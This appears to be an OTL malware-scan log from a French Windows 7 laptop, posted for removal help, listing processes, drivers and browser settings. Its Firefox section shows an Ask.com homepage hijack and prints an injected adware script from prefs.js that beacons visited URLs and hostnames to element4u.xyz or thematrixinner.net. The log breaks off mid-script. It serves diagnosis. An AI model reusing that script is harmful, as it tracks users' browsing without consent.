OTL logfile created on: 06/04/2015 18:09:26 - Run 1 OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\hp\Desktop\S2\electromagnetisme 64bit- Ultimate Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation Internet Explorer (Version = 9.11.9600.17691) Locale: 0000040c | Country: France | Language: FRA | Date Format: dd/MM/yyyy 7,91 Gb Total Physical Memory | 5,13 Gb Available Physical Memory | 64,85% Memory free 15,82 Gb Paging File | 12,75 Gb Available in Paging File | 80,57% Paging File free Paging file location(s): ?:\pagefile.sys [binary data] %SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86) Drive C: | 195,21 Gb Total Space | 72,79 Gb Free Space | 37,29% Space Free | Partition Type: NTFS Drive D: | 292,97 Gb Total Space | 249,88 Gb Free Space | 85,29% Space Free | Partition Type: NTFS Drive E: | 210,35 Gb Total Space | 204,14 Gb Free Space | 97,05% Space Free | Partition Type: NTFS Drive G: | 1,84 Gb Total Space | 0,02 Gb Free Space | 0,84% Space Free | Partition Type: FAT Computer Name: HP-PC | User Name: hp | Logged in as Administrator. Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days [color=#E56717]========== Processes (SafeList) ==========[/color] PRC - [2015/04/06 16:21:45 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\hp\Desktop\S2\electromagnetisme\OTL.exe PRC - [2015/03/26 16:37:29 | 001,442,384 | ---- | M] (BitTorrent Inc.) -- C:\Users\hp\AppData\Roaming\uTorrent\uTorrent.exe PRC - [2015/03/04 23:27:30 | 042,560,368 | ---- | M] (Dropbox, Inc.) -- C:\Users\hp\AppData\Roaming\Dropbox\bin\Dropbox.exe PRC - [2015/01/22 21:48:51 | 000,076,888 | ---- | M] () -- C:\Windows\SysWOW64\PnkBstrA.exe PRC - [2014/12/17 16:11:02 | 001,115,144 | ---- | M] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) -- C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe PRC - [2012/05/25 05:25:02 | 006,595,928 | ---- | M] (Yahoo! Inc.) -- C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe PRC - [2012/04/04 07:25:00 | 000,295,584 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe [color=#E56717]========== Modules (No Company Name) ==========[/color] MOD - [2015/04/05 21:48:35 | 000,043,008 | ---- | M] () -- c:\users\hp\appdata\local\temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpvf1__z.dll MOD - [2015/03/30 22:07:56 | 014,974,280 | ---- | M] () -- C:\Users\hp\AppData\Local\Google\Chrome\Application\41.0.2272.118\PepperFlash\pepflashplayer.dll MOD - [2015/03/30 22:07:56 | 009,279,304 | ---- | M] () -- C:\Users\hp\AppData\Local\Google\Chrome\Application\41.0.2272.118\pdf.dll MOD - [2015/03/30 22:07:54 | 001,174,856 | ---- | M] () -- C:\Users\hp\AppData\Local\Google\Chrome\Application\41.0.2272.118\libglesv2.dll MOD - [2015/03/30 22:07:54 | 000,080,200 | ---- | M] () -- C:\Users\hp\AppData\Local\Google\Chrome\Application\41.0.2272.118\libegl.dll MOD - [2015/03/04 23:08:06 | 000,865,280 | ---- | M] () -- C:\Users\hp\AppData\Roaming\Dropbox\bin\plugins\platforms\qwindows.dll MOD - [2015/03/04 23:08:06 | 000,750,080 | ---- | M] () -- C:\Users\hp\AppData\Roaming\Dropbox\bin\libGLESv2.dll MOD - [2015/03/04 23:08:06 | 000,047,616 | ---- | M] () -- C:\Users\hp\AppData\Roaming\Dropbox\bin\libEGL.dll MOD - [2015/03/04 23:07:48 | 000,200,704 | ---- | M] () -- C:\Users\hp\AppData\Roaming\Dropbox\bin\plugins\imageformats\qjpeg.dll MOD - [2014/12/17 16:11:14 | 000,439,304 | ---- | M] () -- C:\Program Files (x86)\Evernote\Evernote\libxml2.dll MOD - [2014/12/17 16:11:14 | 000,321,032 | ---- | M] () -- C:\Program Files (x86)\Evernote\Evernote\libtidy.dll MOD - [2012/05/25 05:25:00 | 000,921,600 | ---- | M] () -- C:\Program Files (x86)\Yahoo!\Messenger\yui.dll MOD - [2012/05/25 05:25:00 | 000,078,336 | ---- | M] () -- C:\Program Files (x86)\Yahoo!\Messenger\pcre.dll MOD - [2010/01/21 01:34:10 | 008,793,952 | ---- | M] () -- C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll MOD - [2010/01/09 20:18:18 | 004,254,560 | ---- | M] () -- C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF [color=#E56717]========== Services (SafeList) ==========[/color] SRV:[b]64bit:[/b] - [2015/02/20 03:35:05 | 000,114,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService) SRV:[b]64bit:[/b] - [2015/01/30 04:15:10 | 000,366,512 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv) SRV:[b]64bit:[/b] - [2015/01/30 04:15:10 | 000,023,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc) SRV:[b]64bit:[/b] - [2013/11/21 20:37:52 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend) SRV:[b]64bit:[/b] - [2012/10/24 19:53:18 | 000,327,680 | ---- | M] (IDT, Inc.) [Auto | Running] -- C:\Program Files\IDT\WDM\stacsv64.exe -- (STacSV) SRV:[b]64bit:[/b] - [2012/09/24 10:40:56 | 000,031,040 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Windows\SysNative\hpservice.exe -- (hpsrv) SRV:[b]64bit:[/b] - [2009/07/14 02:40:01 | 000,193,536 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\appmgmts.dll -- (AppMgmt) SRV:[b]64bit:[/b] - [2009/03/02 23:42:58 | 000,089,600 | ---- | M] (Andrea Electronics Corporation) [Auto | Running] -- C:\Program Files\IDT\WDM\AESTSr64.exe -- (AESTFilters) SRV - [2015/03/25 16:44:32 | 000,148,080 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance) SRV - [2015/02/04 20:01:21 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc) SRV - [2015/01/22 21:48:51 | 000,076,888 | ---- | M] () [Auto | Running] -- C:\Windows\SysWOW64\PnkBstrA.exe -- (PnkBstrA) SRV - [2014/11/18 21:23:34 | 000,833,728 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service) SRV - [2014/03/20 23:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32) SRV - [2013/12/18 19:56:24 | 000,279,024 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs) SRV - [2013/09/11 21:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32) SRV - [2010/02/19 13:37:14 | 000,517,096 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe -- (SwitchBoard) [color=#E56717]========== Driver Services (SafeList) ==========[/color] DRV:[b]64bit:[/b] - [2014/11/15 15:46:08 | 000,124,560 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv) DRV:[b]64bit:[/b] - [2014/10/25 13:37:52 | 000,127,760 | ---- | M] (Power Software Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\scdemu.sys -- (SCDEmu) DRV:[b]64bit:[/b] - [2014/02/25 20:51:58 | 011,530,992 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NETwsw00.sys -- (NETwNs64) DRV:[b]64bit:[/b] - [2014/02/11 21:06:26 | 000,056,832 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt) DRV:[b]64bit:[/b] - [2014/02/11 21:06:26 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD) DRV:[b]64bit:[/b] - [2014/02/11 18:24:36 | 000,450,520 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud) DRV:[b]64bit:[/b] - [2014/01/24 10:23:30 | 000,552,176 | ---- | M] (Synaptics Incorporated) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\SynTP.sys -- (SynTP) DRV:[b]64bit:[/b] - [2013/12/18 12:27:40 | 000,633,192 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorA.sys -- (iaStorA) DRV:[b]64bit:[/b] - [2013/12/18 12:27:40 | 000,028,008 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorF.sys -- (iaStorF) DRV:[b]64bit:[/b] - [2013/12/06 18:50:32 | 005,363,520 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx) DRV:[b]64bit:[/b] - [2013/11/21 21:00:36 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata) DRV:[b]64bit:[/b] - [2013/11/21 21:00:36 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata) DRV:[b]64bit:[/b] - [2013/11/21 20:24:36 | 000,019,968 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usb8023x.sys -- (usb_rndisx) DRV:[b]64bit:[/b] - [2013/11/21 19:58:54 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec) DRV:[b]64bit:[/b] - [2013/11/21 19:53:30 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\terminpt.sys -- (terminpt) DRV:[b]64bit:[/b] - [2013/11/21 19:53:30 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport) DRV:[b]64bit:[/b] - [2013/09/09 05:14:00 | 000,419,400 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Mbm3CBus.sys -- (Mbm3CBus) DRV:[b]64bit:[/b] - [2013/08/21 01:27:26 | 000,494,864 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\e1c62x64.sys -- (e1cexpress) DRV:[b]64bit:[/b] - [2013/04/26 08:40:22 | 000,176,880 | ---- | M] (JMicron Technology Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\jmcr.sys -- (JMCR) DRV:[b]64bit:[/b] - [2012/12/21 06:44:10 | 000,786,056 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iusb3xhc.sys -- (iusb3xhc) DRV:[b]64bit:[/b] - [2012/12/21 06:44:10 | 000,366,216 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iusb3hub.sys -- (iusb3hub) DRV:[b]64bit:[/b] - [2012/11/20 11:14:40 | 001,866,080 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\snp2uvc.sys -- (SNP2UVC) DRV:[b]64bit:[/b] - [2012/11/08 12:41:34 | 000,418,632 | ---- | M] (ASMedia Technology Inc) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\asmtxhci.sys -- (asmtxhci) DRV:[b]64bit:[/b] - [2012/11/08 12:41:34 | 000,139,592 | ---- | M] (ASMedia Technology Inc) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\asmthub3.sys -- (asmthub3) DRV:[b]64bit:[/b] - [2012/10/24 19:53:18 | 000,543,744 | ---- | M] (IDT, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\stwrt64.sys -- (STHDA) DRV:[b]64bit:[/b] - [2012/09/24 10:40:56 | 000,043,840 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Accelerometer.sys -- (Accelerometer) DRV:[b]64bit:[/b] - [2012/09/24 10:40:56 | 000,031,040 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\hpdskflt.sys -- (hpdskflt) DRV:[b]64bit:[/b] - [2012/08/27 16:39:20 | 000,226,696 | ---- | M] (Renesas Electronics Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nusb3xhc.sys -- (nusb3xhc) DRV:[b]64bit:[/b] - [2012/08/27 16:39:16 | 000,107,912 | ---- | M] (Renesas Electronics Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nusb3hub.sys -- (nusb3hub) DRV:[b]64bit:[/b] - [2012/07/24 20:58:00 | 000,088,832 | ---- | M] (Etron Technology Inc) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\EtronXHCI.sys -- (EtronXHCI) DRV:[b]64bit:[/b] - [2012/07/24 20:58:00 | 000,065,152 | ---- | M] (Etron Technology Inc) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\EtronHub3.sys -- (EtronHub3) DRV:[b]64bit:[/b] - [2012/07/24 20:58:00 | 000,032,512 | ---- | M] (Etron Technology Inc) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\EtronSTOR.sys -- (EtronSTOR) DRV:[b]64bit:[/b] - [2012/07/16 12:38:24 | 000,026,208 | ---- | M] (JMicron Technology Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\johci.sys -- (johci) DRV:[b]64bit:[/b] - [2012/03/26 05:24:02 | 003,341,904 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv) DRV:[b]64bit:[/b] - [2012/03/08 10:09:30 | 000,088,104 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxdiaga.sys -- (b06diag) DRV:[b]64bit:[/b] - [2012/02/22 17:33:36 | 000,539,176 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxois.sys -- (bxois) DRV:[b]64bit:[/b] - [2012/02/22 17:06:00 | 000,178,216 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxfcoe.sys -- (bxfcoe) DRV:[b]64bit:[/b] - [2012/02/22 15:27:02 | 000,157,288 | ---- | M] (Bigfoot Networks, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Xeno7x64.sys -- (BFN7x64) DRV:[b]64bit:[/b] - [2012/01/24 16:44:00 | 000,529,448 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv) DRV:[b]64bit:[/b] - [2010/11/21 04:23:48 | 000,117,248 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tsusbhub.sys -- (tsusbhub) DRV:[b]64bit:[/b] - [2010/11/21 04:23:48 | 000,088,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Synth3dVsc.sys -- (Synth3dVsc) DRV:[b]64bit:[/b] - [2010/11/21 04:23:48 | 000,071,168 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc) DRV:[b]64bit:[/b] - [2010/11/21 04:23:47 | 000,109,056 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus) DRV:[b]64bit:[/b] - [2010/11/21 04:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD) DRV:[b]64bit:[/b] - [2009/11/16 15:45:24 | 000,042,192 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\qd262x64.sys -- (ioatdma2) DRV:[b]64bit:[/b] - [2009/11/16 15:45:21 | 000,040,144 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\qd162x64.sys -- (ioatdma1) DRV:[b]64bit:[/b] - [2009/07/14 02:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs) DRV:[b]64bit:[/b] - [2009/07/14 02:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2) DRV:[b]64bit:[/b] - [2009/07/14 02:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor) DRV:[b]64bit:[/b] - [2009/07/14 00:21:48 | 000,038,400 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tpm.sys -- (TPM) DRV:[b]64bit:[/b] - [2009/06/10 22:01:06 | 001,146,880 | ---- | M] (LSI Corp) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\agrsm64.sys -- (AgereSoftModem) DRV:[b]64bit:[/b] - [2009/06/10 21:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a) DRV:[b]64bit:[/b] - [2009/06/10 21:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir) DRV:[b]64bit:[/b] - [2008/07/31 09:32:24 | 000,058,880 | ---- | M] (Infineon Technologies AG) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ifxtpm.sys -- (IFXTPM) DRV - [2009/07/14 02:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount) [color=#E56717]========== Standard Registry (SafeList) ==========[/color] [color=#E56717]========== Internet Explorer ==========[/color] IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A} IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A} IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-21-3588181205-1423536317-4130440005-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie IE - HKU\S-1-5-21-3588181205-1423536317-4130440005-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie IE - HKU\S-1-5-21-3588181205-1423536317-4130440005-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com IE - HKU\S-1-5-21-3588181205-1423536317-4130440005-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/ar-eg/?ocid=iehp IE - HKU\S-1-5-21-3588181205-1423536317-4130440005-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = fr-FR IE - HKU\S-1-5-21-3588181205-1423536317-4130440005-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 30 F5 43 91 02 4D D0 01 [binary data] IE - HKU\S-1-5-21-3588181205-1423536317-4130440005-1000\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie IE - HKU\S-1-5-21-3588181205-1423536317-4130440005-1000\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie IE - HKU\S-1-5-21-3588181205-1423536317-4130440005-1000\..\SearchScopes,DefaultScope = {6A1806CD-94D4-4689 IE - HKU\S-1-5-21-3588181205-1423536317-4130440005-1000\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02 IE - HKU\S-1-5-21-3588181205-1423536317-4130440005-1000\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={sear IE - HKU\S-1-5-21-3588181205-1423536317-4130440005-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 [color=#E56717]========== FireFox ==========[/color] FF - prefs.js..browser.search.countryCode: "MA" FF - prefs.js..browser.search.isUS: false FF - prefs.js..browser.search.order.1: "Ask.com" FF - prefs.js..browser.search.region: "MA" FF - prefs.js..browser.search.selectedEngine: "Google" FF - prefs.js..browser.startup.homepage: "http://www.search.ask.com/?o=APN11459&gct=hp&d=488-101&v=n13614-463&t=4" FF - prefs.js..extensions.aVFXKjq91RRF5zQL.scode: "(function(){try{if(window.self.location.href.indexOf(\"qTkFrTgHrHC4qjgHpdw5rTwFrE\")>-1){return;}}catch(e){}try{var d=[[\"trianglecash.com\",\"acebook\",\"flybrain.com\",\"www.pcutilitiespro.com\",\"www.pcutilitiespro.net\",\"www.superpctools.com\",\"www.superpctools.net\",\"www.pcrepairlabs.com\",\"www.pcrepairlabs.net\",\"www.viracure.com\",\"www.viracure.net\",\"www.onesave.com\",\"www.onesave.net\",\"www.centralshopgate.com\",\"www.centralshopgate.net\",\"www.safeshopgate.com\",\"www.safeshopgate.net\",\"securedshopgate.com\",\"securedshopgate.net\",\"gen.securedshopgate.com\",\"gen.securedshopgate.net\",\"e4everything.co\",\"3juices.s\",\"safecart.com\",\"cleverbridge.com\",\"warnalert11.com\",\"sumorobo.net\",\"mindri.com\",\"alertfunctions.com\",\"immediate-support.com\",\"sumorobo\",\"roulettebotplus\",\"s.vgsgaming-ads\",\"lottery-master\",\"lotterymaster\",\"onduit\",\"search.imesh\",\"search.searchcore\",\"searchnu.com\",\"searchqu.com\",\"shareazaweb\",\"searchgby.com\",\"mysearchresults.com\",\"searchya.com\",\"searchgol.com\",\"trovi.com\",\"search.ask\",\"mywebsearch.com\",\"search-results.com\",\"mysearch.com\",\"offers.bycontext.com\",\"deals.offer-dynamics.com\",\"offer-dynamics.com\",\"deadsea.com\",\"jerusalem.com\",\"vatican.com\",\"iklk.com\",\"gvud.com\",\"zuzd.com\",\"babaviral.com\",\"cupid.so\",\"hostanytime.com\",\"antivirus.so\",\"dates.am\",\"insurance-company.co\",\"advanceloan.org\",\"calcitapp.info\",\"desktopfavapp.info\",\"avatrade.com\",\"game-trek.net\",\"urgent-alerts.com\",\"pc-alert.com\",\"error-alerts.com\",\"search.searchonme.com\",\"searchitapp.com\",\"news.searchonme.com\",\"search.appsarefun.info\",\"websearch.mocaflix.com\",\"search.easylifeapp.com\",\"searchy.easylifeapp.com\",\"us.yhs4.search.yahoo.com\",\"search.gboxapp.com\",\"searchiy.gboxapp.com\",\"bestonlinegadgetguide.com\",\"odpu.com\",\"safesearch.co\",\"findamo.com\",\"search.myownsearchbox.com\",\"datropy.com\",\"applicationgrabb.net\",\"databass.info\",\"firstfirst.net\",\"liversely.com\",\"liversely.net\",\"livesetwebs.org\",\"lp.ncdownloader.com\",\"lp.vaudix.com\",\"masteroids.com\",\"reditions.net\",\"sharesuper.info\",\"storaget.info\",\"westzip.in\",\"boxhilade.com\",\"mylinksworld.com\",\"shoppingwiz.co\",\"rabbitsearch.net\",\"searchandbake.com\",\"smartshopping.com\",\"www.search.smartshopping.com\",\"www.local.smartshopping.com\",\"www.shoppstop.com\",\"localmoxie.com\",\"www.yellowmoxie.com\",\"www.mail.com\",\"suche.mail.com\",\"www.web.de\",\"suche.web.de\",\"suche.gmx.de\",\"search.gmx.com\",\"search.gmx.co.uk\",\"news.gmx.com\",\"news.gmx.co.uk\",\"www.turbosearchengine.com\",\"search.turbosearchengine.com\",\"www.relatedtopix.com\",\"search.relatedtopix.com\",\"www.app-rover.com\",\"www.appigniter.com\",\"www.bposolutions.com\",\"www.zhuamob.com\",\"www.yieldnexus.com\",\"www.tfxiq.com\",\"www.tfxiq.net\",\"sporty-glow.com\",\"namyneck.com\",\"styloosh.com\",\"baidu.co.th\",\"ooyd.com\",\"jobsro.com\",\"kaoor.com\",\"myloginbox.com\",\"mainpagesite.com\",\"turtleclip.com\",\"blackyclip.com\",\"film-tease.com\",\"bestpaydayloans2015.com\",\"hotelsdealsreviews.com\",\"top10cellphoneplans.com\",\"top5autoinsurance.com\",\"topcreditreportsites.com\"],[/^websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info$/,/search\\.(easylifeapp|gboxapp|searchonme|appsarefun|genieo)\\.com/]];for(var i=0,a=d[0],l=a.length;i-1){return;}}for(var j=0,a=d[1],l=a.length;j-1){(new Image).src = \"//\"+[\"element4u.xyz\",\"thematrixinner.net\"][window.location.protocol!= \"https:\"?0:1]+\"/?n=\"+encodeURIComponent(a[i])+\"&h=\"+encodeURIComponent(window.self.location.href+\"#\"+window.name)+\"&d=\"+encodeURIComponent(window.self.location.hostname)+\"&eid=1120&pid=2921&hid=6512633795638182113\";return;}}for(var j=0,a=u[1],l=a.length;j-1||ifr.src.indexOf('=38462958')>-1||ifr.src.indexOf('1018-1005')>-1||ifr.src.indexOf('1019-1001')>-1||ifr.src.indexOf('2136&zid=')>-1&&ifr.src.indexOf('PT1312')>-1||(ifr.getAttribute('name') && ifr.getAttribute('id')==ifr.getAttribute('name') && ifr.getAttribute('name').match(/^ap\\d+$/)))}};if(\"undefined\"==typeof window.adzy653rk&&document.getElementsByTagName(\"body\").length&&!document.getElementsByTagName(\"body\")[0].getAttribute(\"jhjlijpomuhn_m\")){var removeNode=function(a){for(var 